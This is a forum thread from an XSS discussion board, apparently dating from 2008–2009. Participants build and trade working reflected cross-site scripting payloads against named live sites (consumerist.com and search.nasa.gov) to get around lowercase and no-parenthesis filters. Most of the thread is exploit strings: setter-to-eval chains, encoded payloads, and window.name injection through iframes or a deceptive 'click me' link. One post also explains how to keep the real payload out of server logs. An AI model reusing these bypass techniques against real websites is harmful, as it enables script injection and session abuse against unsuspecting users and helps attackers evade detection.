Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
all lowercase javascript without parenthesis
Posted by: yawnmoth
Date: February 29, 2008 02:48PM

http://consumerist.com/search/';document.body.innerHTML='test';'/

If you view the source code, you'll see that the above is breaking out of a string in a script tag. Normally, I'd expect this to replace the entire page contents with 'test', but in this case, it isn't (atleast not in Firefox), because innerHTML is being turned into innerhtml.

http://consumerist.com/search/';alert('test');/

That doesn't work because parenthesis are being stripped. So, any ideas as to what - if anything - will work?

Options: ReplyQuote
Re: all lowercase javascript without parenthesis
Posted by: Gareth Heyes
Date: February 29, 2008 03:44PM

http://consumerist.com/search/';a%20setter=alert,a=1;'/

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: all lowercase javascript without parenthesis
Posted by: yawnmoth
Date: February 29, 2008 04:54PM

Wow - that's rather obscure, heh. Thanks!

Options: ReplyQuote
Re: all lowercase javascript without parenthesis
Posted by: yawnmoth
Date: February 29, 2008 08:05PM

I was looking into this some more and... I can't think of a way to include an external javascript such as http://ha.ckers.org/s.js with getters or setters?

Or maybe there's another way to include use lowercase javascript without parenthesis?

Options: ReplyQuote
Re: all lowercase javascript without parenthesis
Posted by: ma1
Date: March 01, 2008 05:25AM

location=name

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: all lowercase javascript without parenthesis
Posted by: Gareth Heyes
Date: March 01, 2008 05:30AM

ma1's method would work but so would mine, mine requires a bit more thought though ;)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: all lowercase javascript without parenthesis
Posted by: ma1
Date: March 01, 2008 06:05AM

@Gareth:

the setter trick suffers of 2 limitations:
1) It's not cross browser
2) It works for one shot, one arg evaluations, i.e. it cannot be used with functions which need multiple parameters and the result can't be reused.

Hence if the rules are that no "special" character is allowed beside dots, single quotes and equals (as it seems on that site), the best you can do is probably
a setter = eval, a = name
which has the same constraints as
location = name
(i.e. it needs the window.name property to be pre-injected with the actual payload) but is not portable and requires a comma or a colon, unneeded with the other method.

Obviously I'm very interested in anything that can prove me wrong :)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 5 time(s). Last edit at 03/01/2008 06:10AM by ma1.

Options: ReplyQuote
Re: all lowercase javascript without parenthesis
Posted by: Gareth Heyes
Date: March 01, 2008 07:23AM

@ma1

a setter=atob
e setter=eval
e=a='YWxlcnQoL0FueXRoaW5nIS8p'

Also if lowercase is only required and limited characters:-
e setter=eval
e=1+document.location.search+':'+0

Thornmaker has done lots of PHPIDS vectors with setter and although it's Firefox specific I still think it's cool :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 03/01/2008 07:43AM by Gareth Heyes.

Options: ReplyQuote
Re: all lowercase javascript without parenthesis
Posted by: ma1
Date: March 01, 2008 08:04AM

@Gareth:

cool!

I don't know why but this morning whenever I tried to chain two setter calls and use escape on uneval output, the right side of the assignment got evaluated instead of the return of the setter function (I even thought of some stack optimization, but it was weird nonetheless) :-k

Since it does actually work as expected instead, a self contained and stealth vector would have been something like
hxxp://consumerist.com/search/';u%20setter=unescape;e%20setter=eval;e=u=location;'/#%0Aalert(1)

"have been" because looks like they completely disabled the search function :)
Or is it just me?

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: all lowercase javascript without parenthesis
Posted by: Gareth Heyes
Date: March 01, 2008 08:21AM

@ma1

Ah yes the unescape good call :)

Without using location:-
e setter=eval
u setter=unescape
e=u='%61%6c%65%72%74%28%27%58%53%53%27%29'

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 03/01/2008 08:23AM by Gareth Heyes.

Options: ReplyQuote
Re: all lowercase javascript without parenthesis
Posted by: ma1
Date: March 01, 2008 08:39AM

@Gareth:
I didn't mean to use unescape for obfuscation purposes, but just to decode the %0A into a line break, turning all the leading part of the URL into a JS NOP (label + comment), in order to launch an hash arbitrary payload.
Hash and name are better than an hardcoded payload because they do not allow the target server to log the actual "useful things" your reflected XSS does.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: all lowercase javascript without parenthesis
Posted by: yawnmoth
Date: March 01, 2008 10:54AM

The escape() method doesn't seem to work. i tried this and it didn't work:

';e setter=eval;u setter=unescape;e=u='%61%6c%65%72%74%28%27%58%53%53%27%29';'

I tried doubly escaping it and it didn't work, either:

';e setter=eval;u setter=unescape;e=u='%2561%256c%2565%2572%2574%2528%2527%2558%2553%2553%2527%2529';'

It's almost as though they're recursively urldecode()'ing the input?

edit: I'm not really sure how ma1's location method works. I modified it slightly to see what eval's input was:

http://consumerist.com/search/';u%20setter=unescape;e%20setter=alert;e=u=location;'/#%0Aalert(1)/

I then copy / pasted that into a separate program and modified it a little and got this:

<script>
a = "zzz:\nalert(1)";

eval(a);
</script>

Why does that work? This doesn't:

<script>
zzz:
aert(1);
</script>

So why does it work in the eval?



Edited 3 time(s). Last edit at 03/01/2008 11:29AM by yawnmoth.

Options: ReplyQuote
Re: all lowercase javascript without parenthesis
Posted by: ma1
Date: March 01, 2008 11:56AM

@yawnmoth:
If you can't grab what location = name does, just try to type this on the address bar in IE (or in Firefox without NoScript):

javascript:window.name="javascript:alert(1)";location.href="http://consumerist.com/search/';location=name;'/";


You can launch it from a scriptless page either using an iframe

<iframe name="javascript:alert(1)" src="http://consumerist.com/search/';location=name;'/"></iframe>

or a simple link, tricking someone into clicking it:

<a target="javascript:alert(1)" href="http://consumerist.com/search/';location=name;'/">click me</a>

Regarding
<script>
somelabel://somecomment
alert(1)
</script>

it works as expected -- I suspect yours doesn't work because you mistyped "aert(1)" (missing "l").

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: all lowercase javascript without parenthesis
Posted by: yawnmoth
Date: March 01, 2008 07:54PM

Thanks for catching the typo!

Anyway, in researching this further... I didn't actually know about labels. That's what zzz: and http: are acting as, in this case. The // comments out everything after the label.

Are labels are javascript only thing or do other languages support them?

Options: ReplyQuote
Re: all lowercase javascript without parenthesis
Posted by: ma1
Date: March 02, 2008 05:33AM

yawnmoth Wrote:
-------------------------------------------------------
> Are labels are javascript only thing or do other
> languages support them?

Most languages support them.

Syntax may vary, but the "curly braces" family (including C, C++, C# and Java, plus the whole ECMAScript family of course, just to name the most "mainstream") adopts the syntax you've seen in JavaScript.

It was meant as a target for the ill-famed "goto" statement when supported/tolerated, but nowadays it's mainly used in statements like break/continue to specify outer loops.

ECMAScript makes a very extensive use of labels in its object literal notation:
var obj = { label1: someValue, label2: someOtherValue };

Since you're familiar with PHP, you may find this old discussion interesting.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: all lowercase javascript without parenthesis
Posted by: PaPPy
Date: May 14, 2009 06:48AM

im having simliar issues with a site but i get no %0a or & or parenthesis or single quotes

http://search.nasa.gov/search/search.jsp?nasaInclude=test%22+onmouseover%3D%22document.location%3Dhttp%253A%252F%252Fgoogle%252Ecom

i tried pulling off some of the above alerts but no such luck

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: all lowercase javascript without parenthesis
Posted by: Jurpie
Date: May 15, 2009 04:09AM

PaPPy Wrote:
-------------------------------------------------------
> im having simliar issues with a site but i get no
> %0a or & or parenthesis or single quotes
>
> http://search.nasa.gov/search/search.jsp?nasaInclu
> de=test%22+onmouseover%3D%22document.location%3Dht
> tp%253A%252F%252Fgoogle%252Ecom
>
> i tried pulling off some of the above alerts but
> no such luck

You can try something like this:

http://search.nasa.gov/search/search.jsp?nasaInclude=javascript:alert%2528%2527Hi%20Nasa!%2527%2529%22%20onmouseover=%22window.location=this.value%22%20style=%22width:1000px


It works by double encoding parenthesis.

Options: ReplyQuote
Re: all lowercase javascript without parenthesis
Posted by: Kyo
Date: May 15, 2009 11:24AM

edit: oh wait nevermind, missed the parenthesis bit



Edited 2 time(s). Last edit at 05/15/2009 11:28AM by Kyo.

Options: ReplyQuote


Sorry, only registered users may post in this forum.